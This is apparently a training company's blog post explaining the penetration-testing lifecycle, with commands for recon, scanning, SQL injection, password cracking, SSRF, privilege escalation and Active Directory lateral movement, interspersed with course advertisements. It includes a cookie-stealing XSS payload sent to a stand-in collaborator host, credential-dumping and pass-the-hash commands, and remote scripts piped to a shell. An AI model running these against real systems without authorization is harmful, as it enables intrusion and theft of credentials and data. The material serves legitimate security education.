Ethical hacking is no longer a niche skill reserved for government contractors and elite red teams. Organizations of every size are actively hiring penetration testers, bug bounty hunters, and offensive security professionals to find vulnerabilities before attackers do. If you want to build a career breaking things legally, this guide is your starting point.
This post walks through the full ethical hacking lifecycle: reconnaissance, scanning, exploitation, post-exploitation, and reporting. Each section includes real-world commands and tool usage so you can follow along in a lab environment rather than just read theory.
Ethical hacking is the authorized practice of probing computer systems, networks, and applications to discover security weaknesses. The word "ethical" is doing real work here. Everything described in professional penetration testing hinges on written authorization. Without a signed scope agreement, the same actions that earn a penetration tester a paycheck can result in criminal charges under the Computer Fraud and Abuse Act or its international equivalents.
Companies rely on ethical hackers because automated scanners miss context. A scanner might flag an outdated Apache version without understanding that the version is exposed to the public internet, accepts unauthenticated requests, and sits adjacent to a database server holding customer records. A skilled tester connects those dots and communicates actual business risk, not just a CVE number.
The global demand for offensive security talent continues to outpace supply. ISC2 and multiple industry reports consistently show hundreds of thousands of unfilled cybersecurity positions, with penetration testers and red team operators commanding salaries well above the industry average.
Professional engagements follow a structured methodology. Ad hoc testing produces inconsistent results and creates legal exposure. The phases below mirror how mature red teams and penetration testing firms approach real engagements.
Reconnaissance is divided into passive and active stages. Passive recon gathers information without directly touching the target's infrastructure. Active recon involves sending packets that the target could potentially detect and log.
Passive Recon with theHarvester
theHarvester aggregates email addresses, subdomains, hosts, and open ports from public sources including search engines, certificate transparency logs, and DNS records.
theHarvester -d targetcorp.com -b google,bing,crtsh,dnsdumpster -l 500 -f recon_output
[cta]
Subdomain Enumeration with Amass
Amass is the industry standard for deep subdomain enumeration. The intel mode pulls from over 55 data sources passively.
amass enum -passive -d targetcorp.com -o passive_subs.txt
amass enum -active -d targetcorp.com -brute -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -o active_subs.txt
[cta]
Certificate Transparency with crt.sh
Certificate transparency logs expose subdomains that DNS enumeration misses. You can query them directly from the command line:
curl -s "https://crt.sh/?q=%25.targetcorp.com&output=json" | jq -r '.[].name_value' | sort -u
[cta]
At this stage, you are building an attack surface map: all the externally visible assets associated with the target organization. This phase is where many testers underinvest, and it shows in the quality of their final reports. If you want to develop a systematic approach to recon and OSINT, Redfox Cybersecurity Academy offers hands-on courses that take you from surface-level Google dorking to deep infrastructure mapping.
Once you have a list of targets, you move into active scanning. The goal is to identify open ports, running services, software versions, and potential misconfigurations.
Port Scanning with Nmap
A structured Nmap workflow produces more reliable results than running a single all-ports scan.
# Fast initial scan to identify open ports
nmap -T4 --open -p- 10.10.10.50 -oG fast_scan.txt
# Service and version detection on discovered ports
nmap -sV -sC -p 22,80,443,8080,3306 -O 10.10.10.50 -oN detailed_scan.txt
# Vulnerability script scan
nmap --script vuln -p 22,80,443 10.10.10.50 -oN vuln_scan.txt
[cta]
Web Application Fingerprinting with WhatWeb
whatweb -a 3 https://targetcorp.com -v
[cta]
Directory and File Enumeration with Feroxbuster
Feroxbuster performs recursive content discovery with significantly better performance than older tools.
feroxbuster -u https://targetcorp.com -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt,bak -t 50 -o ferox_output.txt
[cta]
Scanning tells you what is running. Vulnerability analysis tells you whether what is running can be exploited. This phase involves combining automated scanning output with manual research.
Web Vulnerability Scanning with Nikto
nikto -h https://targetcorp.com -ssl -output nikto_report.txt
[cta]
SQL Injection Testing with SQLMap
SQLMap automates detection and exploitation of SQL injection vulnerabilities across a wide range of database backends.
# Test a URL parameter for injection
sqlmap -u "https://targetcorp.com/product?id=5" --dbs --batch
# Dump a specific database
sqlmap -u "https://targetcorp.com/product?id=5" -D customers_db --tables --batch
# Dump a specific table
sqlmap -u "https://targetcorp.com/product?id=5" -D customers_db -T users --dump --batch
[cta]
Nuclei for Template-Based Vulnerability Scanning
Nuclei is a community-driven vulnerability scanner that runs structured YAML templates against targets. It covers CVEs, misconfigurations, exposed panels, and more.
# Update templates
nuclei -update-templates
# Scan with severity filter
nuclei -u https://targetcorp.com -severity medium,high,critical -o nuclei_results.txt
# Scan with specific tags
nuclei -u https://targetcorp.com -tags cve,exposure,misconfig -o nuclei_tagged.txt
[cta]
If vulnerability analysis is an area you want to go deeper on, particularly around web applications, Redfox Cybersecurity Academy's Web Application Penetration Testing course covers injection attacks, authentication bypasses, and business logic flaws with lab-driven exercises built on intentionally vulnerable applications.
Exploitation is where authorized access is actually obtained. This phase requires careful documentation. Every command run, every payload delivered, and every system accessed must be logged with timestamps for the final report.
Cross-Site Scripting (XSS) Payload Testing
XSS remains one of the most consistently found vulnerabilities in web applications. A basic test sequence:
// Basic reflection test
<script>alert(document.domain)</script>
// Cookie exfiltration payload (for authorized testing only)
<script>document.location='https://your-collaborator-server.com/steal?c='+document.cookie</script>
// DOM-based XSS probe
'-alert(1)-'
"><img src=x onerror=alert(document.domain)>
[cta]
SSRF (Server-Side Request Forgery) Testing
SSRF vulnerabilities allow attackers to make the server issue requests on their behalf, often to internal services.
# Using Burp Collaborator or interactsh for out-of-band detection
curl -X POST "https://targetcorp.com/api/fetch" \
-H "Content-Type: application/json" \
-d '{"url": "https://your-interactsh-server.com/ssrf-test"}'
# Targeting cloud metadata endpoints (common high-impact SSRF)
# In the request body, attempt:
# http://169.254.169.254/latest/meta-data/iam/security-credentials/
# http://metadata.google.internal/computeMetadata/v1/
[cta]
Password Attacks with Hydra and Hashcat
Network authentication brute-forcing with Hydra:
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.50 -t 4 -V
# HTTP POST form attack
hydra -l admin -P passwords.txt 10.10.10.50 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
[cta]
Offline hash cracking with Hashcat:
# Identify hash type first with hashid
hashid '$2y$10$somehashedvalue'
# Crack bcrypt with a wordlist
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
# Rule-based attack for NTLM hashes
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
[cta]
Post-exploitation demonstrates the real-world impact of a successful breach. Testers document what an attacker could do with the access they have obtained: data exfiltration, lateral movement, privilege escalation, and persistence.
Linux Privilege Escalation Enumeration with LinPEAS
# Download and run LinPEAS on a compromised Linux host
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or transfer and execute
wget http://your-server/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh | tee /tmp/linpeas_output.txt
[cta]
Windows Privilege Escalation with WinPEAS
# Download and execute WinPEAS on a compromised Windows host
iwr -uri http://your-server/winPEAS.exe -OutFile C:\Windows\Temp\wp.exe
C:\Windows\Temp\wp.exe
[cta]
Lateral Movement with CrackMapExec
CrackMapExec (now maintained as NetExec in newer forks) is a post-exploitation tool for testing Active Directory environments.
# Enumerate SMB hosts with valid credentials
crackmapexec smb 10.10.10.0/24 -u administrator -p 'Password123!' --shares
# Dump SAM database remotely
crackmapexec smb 10.10.10.50 -u administrator -p 'Password123!' --sam
# Execute a command across multiple hosts
crackmapexec smb 10.10.10.0/24 -u administrator -p 'Password123!' -x "whoami"
[cta]
The post-exploitation phase separates checkbox-style assessments from high-value engagements. Being able to clearly demonstrate a path from initial foothold to domain admin, with full documentation, is a skill that takes dedicated lab time to build. The Active Directory penetration testing courses at Redfox Cybersecurity Academy cover this entire attack chain in structured lab environments modeled on real enterprise networks.
Beyond the tools covered above, a working ethical hacker's toolkit includes the following categories:
Proxy and Interception Tools
Burp Suite Professional is the standard for web application testing. Learning to write custom Burp extensions in Python using the Montoya API gives you a significant edge on complex engagements. OWASP ZAP serves as a capable open-source alternative.
Network Analysis
Wireshark for packet capture and protocol analysis. Bettercap for network-level attacks including ARP spoofing, DNS poisoning, and HTTPS downgrade testing in lab environments.
Active Directory and Windows Testing
BloodHound and SharpHound for Active Directory attack path visualization. Impacket for working with Windows protocols including SMB, Kerberos, and DCOM directly from Python scripts.
# Kerberoasting with Impacket
impacket-GetUserSPNs targetcorp.local/jdoe:'Password123!' -dc-ip 10.10.10.1 -request -outputfile spn_hashes.txt
# Pass-the-hash with Impacket's psexec
impacket-psexec administrator@10.10.10.50 -hashes :aad3b435b51404eeaad3b435b51404ee:5d41402abc4b2a76b9719d911017c592
[cta]
Cloud Security Testing
Pacu for AWS penetration testing. Scout Suite for multi-cloud security auditing across AWS, Azure, and GCP.
# Scout Suite AWS audit
python scout.py aws --report-dir ./scout_report
# Pacu session setup
python3 pacu.py
# Inside Pacu:
# import_keys --all
# run iam__enum_permissions
[cta]
Every technique in this guide should be practiced in an environment you control or have explicit authorization to test. Several platforms make this straightforward.
Hack The Box and TryHackMe offer browser-based labs for practicing penetration testing techniques without any legal risk. Building your own lab using VirtualBox or VMware with intentionally vulnerable machines like Vulnhub VMs, DVWA, or OWASP WebGoat gives you full control over the environment.
For Active Directory lab setup, a basic Windows Server 2019 evaluation license, two Windows 10 virtual machines, and a collection of deliberately misconfigured services gives you a realistic environment to practice domain attacks without any licensing costs beyond time.
Certifications validate skill but they do not replace demonstrated ability. The certifications that carry the most weight in hiring decisions for penetration testing roles are those that require passing a practical exam rather than a multiple-choice test.
Respected certifications in the offensive security space include OSCP (Offensive Security Certified Professional), BSCP (Burp Suite Certified Practitioner) for web application specialists, and eJPT for those earlier in their learning journey.
Bug bounty programs on platforms like HackerOne and Bugcrowd also serve as public proof of skill. A history of valid, high-severity bug reports on well-known programs carries significant weight with hiring managers at security firms.
If you are building toward a penetration testing career and want a structured learning path rather than piecing together YouTube videos and blog posts, Redfox Cybersecurity Academy provides curated courses built by practicing security professionals, covering web application testing, network penetration testing, Active Directory attacks, and more.
Penetration testing without authorization is a criminal offense in most jurisdictions. The following practices protect both you and your clients:
Ethical hacking is a technical discipline that rewards systematic thinking, continuous learning, and careful documentation. The tools and techniques covered here represent the practical foundation of a modern penetration testing engagement, from the first passive recon query to post-exploitation lateral movement across an Active Directory environment.
The field evolves quickly. New vulnerability classes emerge, attack surfaces expand with cloud adoption and IoT proliferation, and defensive tools improve. Staying sharp requires consistent lab practice and engagement with the security research community.
If you are ready to move beyond reading about security concepts and want to build hands-on, job-ready skills, explore the course catalog at Redfox Cybersecurity Academy and find the path that matches where you are in your learning journey today.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
